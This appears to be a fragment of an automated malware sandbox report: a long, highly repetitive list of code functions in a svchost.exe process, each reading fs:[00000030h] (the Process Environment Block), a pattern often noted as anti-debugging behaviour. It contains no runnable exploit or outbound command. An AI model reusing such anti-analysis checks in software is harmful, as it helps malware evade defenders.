            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472619 mov eax, dword ptr fs:[00000030h]1_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E627 mov eax, dword ptr fs:[00000030h]1_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03466620 mov eax, dword ptr fs:[00000030h]1_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468620 mov eax, dword ptr fs:[00000030h]1_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343262C mov eax, dword ptr fs:[00000030h]1_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov eax, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C6A6 mov eax, dword ptr fs:[00000030h]1_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034666B0 mov eax, dword ptr fs:[00000030h]1_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6500 mov eax, dword ptr fs:[00000030h]1_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034365D0 mov eax, dword ptr fs:[00000030h]1_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034325E0 mov eax, dword ptr fs:[00000030h]1_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov eax, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov ecx, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464588 mov eax, dword ptr fs:[00000030h]1_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E59C mov eax, dword ptr fs:[00000030h]1_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA456 mov eax, dword ptr fs:[00000030h]1_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342645D mov eax, dword ptr fs:[00000030h]1_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345245A mov eax, dword ptr fs:[00000030h]1_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC460 mov ecx, dword ptr fs:[00000030h]1_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C427 mov eax, dword ptr fs:[00000030h]1_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034304E5 mov ecx, dword ptr fs:[00000030h]1_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA49A mov eax, dword ptr fs:[00000030h]1_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034364AB mov eax, dword ptr fs:[00000030h]1_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034644B0 mov ecx, dword ptr fs:[00000030h]1_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BA4B0 mov eax, dword ptr fs:[00000030h]1_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB40 mov eax, dword ptr fs:[00000030h]1_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8B42 mov eax, dword ptr fs:[00000030h]1_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428B50 mov eax, dword ptr fs:[00000030h]1_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEB50 mov eax, dword ptr fs:[00000030h]1_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342CB7E mov eax, dword ptr fs:[00000030h]1_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504B00 mov eax, dword ptr fs:[00000030h]1_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEBD0 mov eax, dword ptr fs:[00000030h]1_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EBFC mov eax, dword ptr fs:[00000030h]1_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCBF0 mov eax, dword ptr fs:[00000030h]1_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEA60 mov eax, dword ptr fs:[00000030h]1_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCA11 mov eax, dword ptr fs:[00000030h]1_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA24 mov eax, dword ptr fs:[00000030h]1_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EA2E mov eax, dword ptr fs:[00000030h]1_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AD0 mov eax, dword ptr fs:[00000030h]1_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504A80 mov eax, dword ptr fs:[00000030h]1_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468A90 mov edx, dword ptr fs:[00000030h]1_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486AA4 mov eax, dword ptr fs:[00000030h]1_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0946 mov eax, dword ptr fs:[00000030h]1_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504940 mov eax, dword ptr fs:[00000030h]1_2_03504940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov edx, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC97C mov eax, dword ptr fs:[00000030h]1_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC912 mov eax, dword ptr fs:[00000030h]1_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B892A mov eax, dword ptr fs:[00000030h]1_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C892B mov eax, dword ptr fs:[00000030h]1_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C69C0 mov eax, dword ptr fs:[00000030h]1_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034649D0 mov eax, dword ptr fs:[00000030h]1_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA9D3 mov eax, dword ptr fs:[00000030h]1_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE9E0 mov eax, dword ptr fs:[00000030h]1_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
